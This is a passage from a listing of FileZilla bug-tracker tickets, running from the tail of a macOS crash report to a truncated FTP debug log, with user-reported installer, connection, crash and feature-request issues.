(3789.60.24) <5DFCDC05-6CBC-35A6-8B92-DF6803492E12> /usr/lib/system/libkxld.dylib 0x7fffc7337000 - 0x7fffc7337fff liblaunch.dylib (972.60.2) <D3306CFF-58AA-3C90-B06C-B70E80E60C5B> /usr/lib/system/liblaunch.dylib 0x7fffc7338000 - 0x7fffc733dff3 libmacho.dylib (898) <17D5D855-F6C3-3B04-B680-E9BF02EF8AED> /usr/lib/system/libmacho.dylib 0x7fffc733e000 - 0x7fffc7340ff3 libquarantine.dylib (85.50.1) <12448CC2-378E-35F3-BE33-9DC395A5B970> /usr/lib/system/libquarantine.dylib 0x7fffc7341000 - 0x7fffc7342ffb libremovefile.dylib (45) <38D4CB9C-10CD-30D3-8B7B-A515EC75FE85> /usr/lib/system/libremovefile.dylib 0x7fffc7343000 - 0x7fffc735bff7 libsystem_asl.dylib (349.50.5) <096E4228-3B7C-30A6-8B13-EC909A64499A> /usr/lib/system/libsystem_asl.dylib 0x7fffc735c000 - 0x7fffc735cff7 libsystem_blocks.dylib (67) <10DC5404-73AB-35B3-A277-A8AFECB476EB> /usr/lib/system/libsystem_blocks.dylib 0x7fffc735d000 - 0x7fffc73eafef libsystem_c.dylib (1158.50.2) <E5AE5244-7D0C-36AC-8BB6-C7AE7EA52A4B> /usr/lib/system/libsystem_c.dylib 0x7fffc73eb000 - 0x7fffc73eeffb libsystem_configuration.dylib (888.60.2) <BECC01A2-CA8D-31E6-BCDF-D452965FA976> /usr/lib/system/libsystem_configuration.dylib 0x7fffc73ef000 - 0x7fffc73f2fff libsystem_coreservices.dylib (41.4) <7D26DE79-B424-3450-85E1-F7FAB32714AB> /usr/lib/system/libsystem_coreservices.dylib 0x7fffc73f3000 - 0x7fffc740bfff libsystem_coretls.dylib (121.50.4) <EC6FCF07-DCFB-3A03-9CC9-6DD3709974C6> /usr/lib/system/libsystem_coretls.dylib 0x7fffc740c000 - 0x7fffc7412fff libsystem_dnssd.dylib (765.50.9) <CC960215-0B1B-3822-A13A-3DDE96FA796F> /usr/lib/system/libsystem_dnssd.dylib 0x7fffc7413000 - 0x7fffc743cff7 libsystem_info.dylib (503.50.4) <611DB84C-BF70-3F92-8702-B9F28A900920> /usr/lib/system/libsystem_info.dylib 0x7fffc743d000 - 0x7fffc745fff7 libsystem_kernel.dylib (3789.60.24) <6E9E485F-91F6-36B7-A125-AE91DC978BCC> /usr/lib/system/libsystem_kernel.dylib 0x7fffc7460000 - 0x7fffc74a7fe7 libsystem_m.dylib (3121.6) <86D499B5-BBDC-3D3B-8A4E-97AE8E6672A4> /usr/lib/system/libsystem_m.dylib 0x7fffc74a8000 - 0x7fffc74c6ff7 libsystem_malloc.dylib (116.50.8) <A3D15F17-99A6-3367-8C7E-4280E8619C95> /usr/lib/system/libsystem_malloc.dylib 0x7fffc74c7000 - 0x7fffc7520ffb libsystem_network.dylib (856.60.1) <369D0221-56CA-3C3E-9EDE-94B41CAE77B7> /usr/lib/system/libsystem_network.dylib 0x7fffc7521000 - 0x7fffc752aff3 libsystem_networkextension.dylib (563.60.2) <B021F2B3-8A75-3633-ABB0-FC012B8E9B0C> /usr/lib/system/libsystem_networkextension.dylib 0x7fffc752b000 - 0x7fffc7534ff3 libsystem_notify.dylib (165.20.1) <B8160190-A069-3B3A-BDF6-2AA408221FAE> /usr/lib/system/libsystem_notify.dylib 0x7fffc7535000 - 0x7fffc753dfe7 libsystem_platform.dylib (126.50.8) <897462FD-B318-321B-A554-E61982630F7E> /usr/lib/system/libsystem_platform.dylib 0x7fffc753e000 - 0x7fffc7548ff7 libsystem_pthread.dylib (218.60.3) <B8FB5E20-3295-39E2-B5EB-B464D1D4B104> /usr/lib/system/libsystem_pthread.dylib 0x7fffc7549000 - 0x7fffc754cff7 libsystem_sandbox.dylib (592.60.1) <DC780631-BD23-36B1-9376-668619E18D25> /usr/lib/system/libsystem_sandbox.dylib 0x7fffc754d000 - 0x7fffc754eff3 libsystem_secinit.dylib (24.50.4) <F78B847B-3565-3E4B-98A6-F7AD40392E2D> /usr/lib/system/libsystem_secinit.dylib 0x7fffc754f000 - 0x7fffc7556ffb libsystem_symptoms.dylib (532.50.47) <3390E07C-C1CE-348F-ADBD-2C5440B45EAA> /usr/lib/system/libsystem_symptoms.dylib 0x7fffc7557000 - 0x7fffc756aff7 libsystem_trace.dylib (518.60.2) <6B145B10-5874-3E89-90CD-D370DB475BA1> /usr/lib/system/libsystem_trace.dylib 0x7fffc756b000 - 0x7fffc7570ffb libunwind.dylib (35.3) <3D50D8A8-C460-334D-A519-2DA841102C6B> /usr/lib/system/libunwind.dylib 0x7fffc7571000 - 0x7fffc759aff7 libxpc.dylib (972.60.2) <1C9AF716-69DF-359F-85E9-7DFDE362F9A2> /usr/lib/system/libxpc.dylib External Modification Summary: Calls made by other processes targeting this process: task_for_pid: 0 thread_create: 0 thread_set_state: 0 Calls made by this process: task_for_pid: 0 thread_create: 0 thread_set_state: 0 Calls made by all processes on this machine: task_for_pid: 23262 thread_create: 0 thread_set_state: 0 VM Region Summary: ReadOnly portion of Libraries: Total=278.9M resident=0K(0%) swapped_out_or_unallocated=278.9M(100%) Writable regions: Total=247.1M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=247.1M(100%) VIRTUAL REGION REGION TYPE SIZE COUNT (non-coalesced) =========== ======= ======= Accelerate framework 512K 4 Activity Tracing 256K 2 CG backing stores 28.5M 5 CG image 576K 24 CG raster data 22.9M 26 CoreAnimation 220K 9 CoreUI image data 1652K 9 CoreUI image file 184K 4 Foundation 28K 3 Kernel Alloc Once 8K 2 MALLOC 187.6M 116 MALLOC guard page 64K 13 Memory Tag 242 12K 2 Memory Tag 251 12K 2 OpenCL 16K 3 STACK GUARD 56.0M 9 Stack 11.6M 9 VM_ALLOCATE 92K 18 __DATA 24.2M 232 __GLSLBUILTINS 2588K 2 __IMAGE 528K 2 __LINKEDIT 118.6M 11 __TEXT 160.3M 231 __UNICODE 556K 2 mapped file 76.9M 21 shared memory 16.3M 12 =========== ======= ======= TOTAL 710.0M 747 Model: MacBookPro12,1, BootROM MBP121.0167.B24, 2 processors, Intel Core i5, 2,7 GHz, 8 GB, SMC 2.28f7 Graphics: Intel Iris Graphics 6100, Intel Iris Graphics 6100, Built-In Memory Module: BANK 0/DIMM0, 4 GB, DDR3, 1867 MHz, 0x02FE, 0x4544464132333241324D412D4A442D460000 Memory Module: BANK 1/DIMM0, 4 GB, DDR3, 1867 MHz, 0x02FE, 0x4544464132333241324D412D4A442D460000 AirPort: spairport_wireless_card_type_airport_extreme (0x14E4, 0x133), Broadcom BCM43xx 1.0 (7.21.171.126.1a2) Bluetooth: Version 5.0.4f18, 3 services, 27 devices, 1 incoming serial ports Network Service: Wi-Fi, AirPort, en0 Serial ATA Device: APPLE SSD SM0128G, 121,33 GB USB Device: USB 3.0 Bus USB Device: Bluetooth USB Host Controller Thunderbolt Bus: MacBook Pro, Apple Inc., 27.1 |
|||||
#11322 | 3.26.2 installer install 3.26.1 version | Bug report | normal | FileZilla Client | fixed | |
Description |
Hi, I have installed FileZilla 3.26.2 from 3.26.2 installer for windows (64 bits) and the filezilla installed is 3.26.1 version. Thanks to solve it ++ |
|||||
#11328 | 552 Disk full - please upload later | Bug report | normal | Other | rejected | |
Description |
Hello, I have the problem of "552 Disk full - please upload later" when I want to transfer files. What sould I do ? Thanks in advance, Gmmal |
|||||
#11330 | Filezilla FTP Client updates even though Never update is set | Bug report | normal | FileZilla Client | rejected | |
Description |
I have the Update option in settings set to Never but the programme still updates to newer versions. When this happens, I open the programme, it checks for new versions and downloads it, it then says it needs to be installed. |
|||||
#11331 | Crash while using wrong protocoll | Bug report | normal | FileZilla Client | duplicate | |
Description |
When I use e.g. the wrong protocoltype ssh://10.0.0.11 as host and try to connect to it, FileZilla will crash with following errormessages: --------------------------- MinGW Runtime Assertion --------------------------- Assertion failed! Program: D:\Programs\FileZilla FTP Client\filezilla.exe File: ../../../../packages/FileZilla3/src/engine/server.cpp, Line 245 Expression: serverProtocol != UNKNOWN --------------------------- Abort Retry Ignore --------------------------- --------------------------- Microsoft Visual C++ Runtime Library --------------------------- Runtime Error! Program: D:\Programs\FileZilla FTP Client\filezilla.exe This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. --------------------------- OK --------------------------- |
|||||
#11332 | Let me choose which program to use to view/edit | Feature request | normal | FileZilla Client | worksforme | |
Description |
I know I can assign a specific program to a specific file extension... But my problem is, sometimes I just want to edit one line of code, so I'd like to edit it with Notepad++ But another time I'd like to work on a bigger project and I would like to edit many files with, let's say PHPstorm... So I'd like to have a dialog which asks me with which program I'd like to open/edit the file. Maybe a bit similar to this request https://trac.filezilla-project.org/ticket/3696. |
|||||
#11333 | 3.27.0 32-bit shell extension is not working Windows 32-bit | Bug report | normal | FileZilla Client | fixed | |
Description |
Hello, 32-bit shell extension is not working Windows 32-bit versions since version 3.27.0. It is not possible to register fzshellext.dll using regsvr32.exe |
|||||
#11336 | Missing ../storj/events.hpp file fails compilation | Bug report | normal | FileZilla Client | fixed | |
Description |
I am trying to compile FileZilla with Storj support from sources.
The In file included from ../../../src/engine/storj/connect.cpp:4:0: ../../../src/engine/storj/event.h:4:31: fatal error: ../storj/events.hpp: No such file or directory #include "../storj/events.hpp" There is no "events.hpp" file in the FileZilla_3.27.0.1_src.tar.bz2 source package. However, I found it in the SVN repo. After copying it manually, the build is successful. Please, make sure that the "events.hpp" file is included in the source package. |
|||||
#11340 | Web browser style download links and Manual transfers | Feature request | normal | FileZilla Client | worksforme | |
Description |
Sometimes you get ftp download links that are formatted in such a way that they contain username and passwords in the downloadlink. such as: "ftp://username:password@WEB.URL/RemoteFolder/RemoteFileName" When you copy/paste this link in your browser the download will simply start. If you extract the required informations from the link (site; remote folder; username; password and filename) and use the 'Manual Transfer (Ctrl+M)' function of filezilla then it doesn't work. It looks like this is because filezilla always tries to get a directory listing and possibly some other information, which the remote server refuses. Would it be possible to add a feature that does simply start downloading without any other actions that could be blocked by the remote server? Or a check box in the manual download to disable asking for remote listings. Alternatively a url bar in the manual download dialog into which the user can paste the URL and filezilla automatically extract the information and starts the download. |
|||||
#11343 | Drag and drop no longer works | Bug report | normal | FileZilla Client | duplicate | |
Description |
The drag and drop feature no works in version 3.27.0.1 for Windows 7. That is, I am no longer able to drag and drop files or folders between machines (local site and remote site) in the connections tabs. Please restore drag and drop capabilities. I've included the information from the about window below in case this is useful: FileZilla Client Version: 3.27.0.1 Build information:
Linked against:
Operating system:
|
|||||
#11345 | every time I start an error msg appears. | Bug report | normal | FileZilla Client | worksforme | |
Description |
every time I start an error msg appears. Cannot find filezilla.xml How can I correct? The file filezilla.xml IS present in the correct folder |
|||||
#11348 | Can't Login | Bug report | normal | FileZilla Client | rejected | |
Description |
Status: Resolving address of ftp.farrockawaycog.com Status: Connecting to 66.196.82.113:21... Status: Connection established, waiting for welcome message... Status: Initializing TLS... Status: Verifying certificate... Status: TLS connection established. Command: USER farrockaway1318@…@farrockawaycog.com Response: 331 User farrockaway1318@…@farrockawaycog.com OK. Password required Command: PASS * Response: 530 Login authentication failed Error: Critical error: Could not connect to server |
|||||
#11349 | Feature request | Feature request | normal | FileZilla Client | duplicate | |
Description |
Hi Guys, Thank you for this amazing software. I have 2 new features that I believe will be very useful: 1 connect the filzilla client to A google account so that the server XML list can be backed up to the drive, and will auto sync when a new server is added or a server details are updated. 2 Share details with another user. A user will be able to share 1 or many or all server details with another user by a quick export import system that uses email or any other data sharing software. I hope you guys like the idea's I am a user with a few computers, and move around, and I feel that these days, these 2 features will help many people. |
|||||
#11352 | FTP from win10 PC to TSO/ISPF | Bug report | normal | FileZilla Client | rejected | |
Description |
Hi, FZ version 3.27.0.1 I enter a custom command "site tracks pri=300 sec=30" to overwrite the z/OS default size allocation but the site tracks pri=300 sec=30 is not taken. The Z/OS file get allocate to the z/os default size of 15 tracks which is not enough to hold the PC file (11.7MB). once the z/os file get full then FZ start looping From the log: Command: PASV Response: 227 Entering Passive Mode (x,x,x,50,21,72) Command: APPE INSTALL Response: 125 Appending to data set FJ09.INSTALL.CD.FILES.INSTALL Response: 451-System completion code and reason: B37-04 Response: 451-Data set is out of space. Response: 451 Transfer aborted due to file error. Error: File transfer failed after transferring 1024.0 KiB in 1 second Status: Starting upload of D:\FTP\R6501.ML005\MVS\FILE\INSTALL Status: Retrieving directory listing of "'FJ09.INSTALL.CD.FILES.'"... Command: PASV I know the error 451-System completion code and reason: B37-04 is because the z/os file is full. my problem is "why FZ did not take the custom command?" Site tracks pri=300 sec=30 when I get the response of accepted. From the log: Command: site tracks pri=300 sec=30 Response: 200 SITE command was accepted I you need other details, let me know. Regards. ...jy |
|||||
#11353 | MalwareBytes vs FileZilla? | Bug report | normal | FileZilla Client | worksforme | |
Description |
8/1/2017 Getting annoyed with FileZilla, using version 3.24.1 and they keep saying that 3.27.0.1 is available for installation (already downloaded for me). I hit install, and relaunch, and use. When I exit I receive this: ERROR SAVING QUEUE An error occurred saving the transfer queue to C:\Users\steve_000\AppData\Roaming\FileZilla\queue.sqlite3 Some queue items might not have been saved. OK button When I re-initialize program I get same error, this time it is ERROR LOADING QUEUE, same path and file ending in sqlite.3 except last error line changes to Some queue items might not have been restored. OK button Proceed to exit program so that 3.27.0.1 can install, which it seems to do. I go online, xfer files, and exit. Next time I open I get the ERROR message above with last word=restored. OK button Next day, apparently 3.27.0.1 did not install previously, because I am prompted again to re-install it. I've reinstalled thru this loop 4x now. Enough already! Tried download from Filezilla-project.org; 64bit Windows I do not want Web Companion Pro, so I select "No, don't protect me" I have 5 components to select, bottom 4 are selected and I cannot select top box which is FileZilla Client? I install to C:\Program Files\FileZilla FTP Client Seems to install. Get to Setup Complete page, and I Click finish, and "start FileZilla Now" Program opens, I go to my webhost and upload a file. Seems to work. CTRL-Q exits okay. Next day, start all over! |
|||||
#11355 | Product Site's Bundled Installer download file has Adware.OSX.Spigot virus | Bug report | normal | FileZilla Client | rejected | |
Description |
I had updated FileZilla when it was released on 19 July but it was through the Update Check within the running FileZilla. No virus was flagged with that installer. Yesterday (August 3) I downloaded FileZilla again to be sure I had the latest version and my virus checker identified the installer as having a virus in it. This time, I downloaded the file from the FileZilla website. I didn't expect to get a virus from the product website. My virus checker, ClamXAV, flagged this installer as having a virus. The two installers must have come from a different source. The installer from https://filezilla-project.org/download.php?type=client, was flagged by ClamXAV as: File Name Infection Name Status /Users/cinzia/Downloads/FileZilla_3.27.0.1_macosx-x86_setup_bundled.zip Adware.OSX.Spigot Status: I trashed that installer. The file that downloaded was https://download.filezilla-project.org/client/FileZilla_3.27.0.1_macosx-x86_setup_bundled.zip. The page had a line just below the download link: "This installer may include bundled offers." This can be acceptable but not if it includes a virus in it also. Next, I tried downloading the installer from SourceForge at https://sourceforge.net/projects/filezilla/files/ and got a clean installer: Download FileZilla_3.17.0.1_macosx-x86.app.tar.bz2 (7.6 MB). It was not flagged as having a virus. Whether the installer has a virus or not depends on the source of the downloaded file. Clean installers are from within the running FileZilla Update and from SourceForge. The FileZilla product website provides an installer with a virus. That needs to be cleaned up or point people to other download sites for the OS X system that don't provide an installer with the virus. There was a link on the page for More Options but they were for different operating systems. |
|||||
#11357 | FileZilla 3.27.0.1 unable to connect to RHEL 7.4. Able to connect with other SFTP clients including command line | Bug report | normal | FileZilla Client | fixed | |
Description |
My web server was recently updated from RHEL 7.3 to 7.4. After this regular server OS update I am unable to log in with Filezilla 3.27.0.1. I use passwordless login to connect over SSH and this was working fine (in FileZilla) until the server OS update last night. None of the server SSH config files were modified as part of the OS update (based on file creation/modified dates). I am able to connect to the server via the command line sftp client. I'm also able to connect with at least two other SFTP guis (Caja and gFTP). |
|||||
#11358 | Feature Request - Log and Notification by Email or Push. | Feature request | normal | FileZilla Client | rejected | |
Description |
It would be great if FileZilla had a Transmission Report that logged the downloads/uploads with the time completed as well as the total time of transfer and then notified user by email when transmission whether by que or file was completed. Thanks for your consideration |
|||||
#11360 | Unable to see File Information in OneDrive folder | Bug report | normal | FileZilla Client | fixed | |
Description |
OneDrive has recently updated and since then FileZilla no longer shows file information ie modified date/size etc if the file is in the local cache. This then prevents drag and drop from working. If the file is local only then information is shown & everything works as expected. |
|||||
#11362 | Slow Upload on File Overwrite | Bug report | normal | FileZilla Client | rejected | |
Description |
Uploading a 1 MB image:
Then, uploading the same image:
|
|||||
#11365 | Allow to point to path using a system environment | Feature request | normal | FileZilla Client | rejected | |
Description |
Allow when connecting to linux to list files using the system environment variable path |
|||||
#11366 | Snap or Flatpack? | Feature request | normal | FileZilla Client | rejected | |
Description |
Dear Maintainers, it seems that every distribution is far behind your actual release, which contains the storj.io-prot. Can you please consider to create a snap or flatpack? that would give the biggest part of linux-community (OSX as well?) instant access to your releases and they would work, independent from the distro(-flaws). … … IMHO, I would prefer a snap over flatpack, because they have a centralized store and I can search and install from *all* available snaps with one cmd from the cli: "snap find filezilla && snap install filezilla", then i can just run filezilla by it's name, without any complicated run cmds. Auto-update included! In opposite, flatpacks are cluttered over the whole internet, and hard to find, need extra cmd-syntax to start, etc. by far not so convenient, but hey, I would not complain ;), but may be others, not so CLI-proofed users. autoupdate only if I add every special repository (if there is one), ending up in the need to maintain a repository-list on all machines… Just another sysops nightmare. Thanks for considering TIA guenter |
|||||
#11367 | installation error in v3.27.1 | Bug report | normal | FileZilla Client | fixed | |
Description |
Dear Sir / Madam I am getting the following error, when trying to install Filezilla v3.27.1 (64 bit) on my Windows 10 PC. Can't write: C:\Program Files\Filezilla FTP Client\fzsftp.exe This error occured, when I tried updating the Filezilla installation using my limited access account, by entering the admin credentials. To double confirm, I did login to the admin user account and tried installing Filezilla Client once again, but, the same issue occured again. Currently, I am searching for older version of filezilla client, to continue working, as before. please help fix this issue with Filezilla CLient v3.27.1 thank you With Best Regards Raghu veer |
|||||
#11368 | Error loading xml file | Bug report | normal | FileZilla Client | worksforme | |
Description |
Hi, after update to 3.27.1 I lost all saved hosts an return the error in attach |
|||||
#11369 | Editing a file by opening it in SublimText then replacing it to Filezilla results in failure | Feature request | normal | FileZilla Client | fixed | |
Description |
Hi, I've updated Filezilla yesterday to the newest version (3.27.1). Today I had to edit files from Filezilla (address change). Once I changed my address, I saved the changes and then agreed the update on FileZilla. As a result, I have a message error reading "file transfer failed" |
|||||
#11370 | Unable to download more than 2 GB files using filezilla client | Other | normal | FileZilla Client | worksforme | |
Description |
Hi, we got the error message it says unable to download more than 2 GB. Kindly advise Thx |
|||||
#11373 | Availability of Chracters; for creating new directory yes, same for renaming an existing directory no | Bug report | normal | FileZilla Client | worksforme | |
Description |
Hi. I experience the following: Creating a new directory (local or server does not matter) like [ text ] works normal. But trying to add characters like [ or ] to an existing directory like previous_name --> [text]_previous_name those characters can't be typed in the directory renaming input field… But: Copying the desired characters into clipboard, the pasting of them is allowed into the renaming input field… Thanks for listening |
|||||
#11375 | Owner and Group fields showing number/ID, not name | Bug report | normal | FileZilla Client | rejected | |
Description |
This is something I noticed this week, so I suspect it's related to the latest release: 3.27.1. Basically, file lists show numbers/IDs for the owner and group of files, instead of showing their respective names. This is not specific to one hosting platform and a test with another FTP client shows the correct behaviour. The only exception is WP Engine, which shows user names. FileZilla Client Version: 3.27.1 Build information:
Linked against:
Operating system:
Debug log 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 0 11:42:14 Status: Resolving address of accountingbayside.com.au 11:42:14 Status: Connecting to 103.42.110.22:21... 11:42:14 Status: Connection established, waiting for welcome message... 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 11:42:14 Response: 220-You are user number 2 of 50 allowed. 11:42:14 Response: 220-Local time is now 11:42. Server port: 21. 11:42:14 Response: 220-This is a private system - No anonymous login 11:42:14 Response: 220-IPv6 connections are also welcome on this server. 11:42:14 Response: 220 You will be disconnected after 15 minutes of inactivity. 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 1 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 2 11:42:14 Command: AUTH TLS 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 234 AUTH TLS OK. 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 2 11:42:14 Status: Initializing TLS... 11:42:14 Trace: CTlsSocketImpl::Handshake() 11:42:14 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:14 Trace: TLS handshake: About to send CLIENT HELLO 11:42:14 Trace: TLS handshake: Sent CLIENT HELLO 11:42:14 Trace: CTlsSocketImpl::OnSend() 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:14 Trace: TLS handshake: Received SERVER HELLO 11:42:14 Trace: TLS handshake: Processed SERVER HELLO 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:14 Trace: TLS handshake: Received CERTIFICATE 11:42:14 Trace: TLS handshake: Processed CERTIFICATE 11:42:14 Trace: TLS handshake: Received SERVER KEY EXCHANGE 11:42:14 Trace: TLS handshake: Processed SERVER KEY EXCHANGE 11:42:14 Trace: TLS handshake: Received SERVER HELLO DONE 11:42:14 Trace: TLS handshake: Processed SERVER HELLO DONE 11:42:14 Trace: TLS handshake: About to send CLIENT KEY EXCHANGE 11:42:14 Trace: TLS handshake: Sent CLIENT KEY EXCHANGE 11:42:14 Trace: TLS handshake: About to send FINISHED 11:42:14 Trace: TLS handshake: Sent FINISHED 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:14 Trace: TLS handshake: Received NEW SESSION TICKET 11:42:14 Trace: TLS handshake: Processed NEW SESSION TICKET 11:42:14 Trace: TLS handshake: Received FINISHED 11:42:14 Trace: TLS handshake: Processed FINISHED 11:42:14 Trace: TLS Handshake successful 11:42:14 Trace: Protocol: TLS1.2, Key exchange: ECDHE-RSA, Cipher: AES-256-GCM, MAC: AEAD 11:42:14 Status: Verifying certificate... 11:42:14 Status: TLS connection established. 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 5 11:42:14 Command: USER accountingbay 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 331 User accountingbay OK. Password required 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 5 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 5 11:42:14 Command: PASS 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 230 OK. Current restricted directory is / 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 5 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 6 11:42:14 Command: SYST 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 215 UNIX Type: L8 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 6 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 7 11:42:14 Command: FEAT 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 211-Extensions supported: 11:42:14 Response: EPRT 11:42:14 Response: IDLE 11:42:14 Response: MDTM 11:42:14 Response: SIZE 11:42:14 Response: MFMT 11:42:14 Response: REST STREAM 11:42:14 Response: MLST type*;size*;sizd*;modify*;UNIX.mode*;UNIX.uid*;UNIX.gid*;unique*; 11:42:14 Response: MLSD 11:42:14 Response: AUTH TLS 11:42:14 Response: PBSZ 11:42:14 Response: PROT 11:42:14 Response: UTF8 11:42:14 Response: TVFS 11:42:14 Response: ESTA 11:42:14 Response: PASV 11:42:14 Response: EPSV 11:42:14 Response: SPSV 11:42:14 Response: ESTP 11:42:14 Response: 211 End. 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 7 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 9 11:42:14 Command: OPTS UTF8 ON 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 200 OK, UTF-8 enabled 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 9 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 10 11:42:14 Command: PBSZ 0 11:42:14 Trace: CTlsSocketImpl::OnRead() 11:42:14 Trace: CFtpControlSocket::OnReceive() 11:42:14 Response: 200 PBSZ=0 11:42:14 Trace: CFtpLogonOpData::ParseResponse() in state 10 11:42:14 Trace: CControlSocket::SendNextCommand() 11:42:14 Trace: CFtpLogonOpData::Send() in state 11 11:42:14 Command: PROT P 11:42:15 Trace: CTlsSocketImpl::OnRead() 11:42:15 Trace: CFtpControlSocket::OnReceive() 11:42:15 Response: 200 Data protection level set to "private" 11:42:15 Trace: CFtpLogonOpData::ParseResponse() in state 11 11:42:15 Status: Logged in 11:42:15 Trace: Measured latency of 36 ms 11:42:15 Trace: CFtpControlSocket::ResetOperation(0) 11:42:15 Trace: CControlSocket::ResetOperation(0) 11:42:15 Trace: CFileZillaEnginePrivate::ResetOperation(0) 11:42:17 Status: Retrieving directory listing of "/public_html/wp-content/themes/accounting"... 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpListOpData::ListSend() in state 0 11:42:17 Trace: CFtpChangeDirOpData::Send() in state 0 11:42:17 Trace: CFtpChangeDirOpData::Send() in state 2 11:42:17 Command: CWD /public_html/wp-content/themes/accounting 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 250 OK. Current directory is /public_html/wp-content/themes/accounting 11:42:17 Trace: CFtpChangeDirOpData::ParseResponse() in state 2 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpChangeDirOpData::Send() in state 3 11:42:17 Command: PWD 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 257 "/public_html/wp-content/themes/accounting" is your current location 11:42:17 Trace: CFtpChangeDirOpData::ParseResponse() in state 3 11:42:17 Trace: CFtpControlSocket::ResetOperation(0) 11:42:17 Trace: CControlSocket::ResetOperation(0) 11:42:17 Trace: CControlSocket::ParseSubcommandResult(0) 11:42:17 Trace: CFtpListOpData::SubcommandResult() in state 1 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpListOpData::ListSend() in state 2 11:42:17 Trace: CFtpRawTransferOpData::Send() in state 1 11:42:17 Command: TYPE I 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 200 TYPE is now 8-bit binary 11:42:17 Trace: CFtpRawTransferOpData::ParseResponse() in state 1 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpRawTransferOpData::Send() in state 2 11:42:17 Command: PORT 192,168,0,100,84,30 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 500 I won't open a connection to 192.168.0.100 (only to 220.240.224.138) 11:42:17 Trace: CFtpRawTransferOpData::ParseResponse() in state 2 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpRawTransferOpData::Send() in state 2 11:42:17 Command: PASV 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 227 Entering Passive Mode (103,42,110,22,249,133) 11:42:17 Trace: CFtpRawTransferOpData::ParseResponse() in state 2 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpRawTransferOpData::Send() in state 4 11:42:17 Trace: Binding data connection source IP to control connection source IP 192.168.0.100 11:42:17 Command: MLSD 11:42:17 Trace: CTransferSocket::OnConnect 11:42:17 Trace: CTlsSocketImpl::Handshake() 11:42:17 Trace: Trying to resume existing TLS session. 11:42:17 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:17 Trace: TLS handshake: About to send CLIENT HELLO 11:42:17 Trace: TLS handshake: Sent CLIENT HELLO 11:42:17 Trace: CTlsSocketImpl::OnSend() 11:42:17 Trace: CTlsSocketImpl::OnSend() 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 150 Accepted data connection 11:42:17 Trace: CFtpRawTransferOpData::ParseResponse() in state 4 11:42:17 Trace: CControlSocket::SendNextCommand() 11:42:17 Trace: CFtpRawTransferOpData::Send() in state 5 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTlsSocketImpl::ContinueHandshake() 11:42:17 Trace: TLS handshake: Received SERVER HELLO 11:42:17 Trace: TLS handshake: Processed SERVER HELLO 11:42:17 Trace: TLS handshake: Received FINISHED 11:42:17 Trace: TLS handshake: Processed FINISHED 11:42:17 Trace: TLS handshake: About to send FINISHED 11:42:17 Trace: TLS handshake: Sent FINISHED 11:42:17 Trace: TLS Handshake successful 11:42:17 Trace: TLS 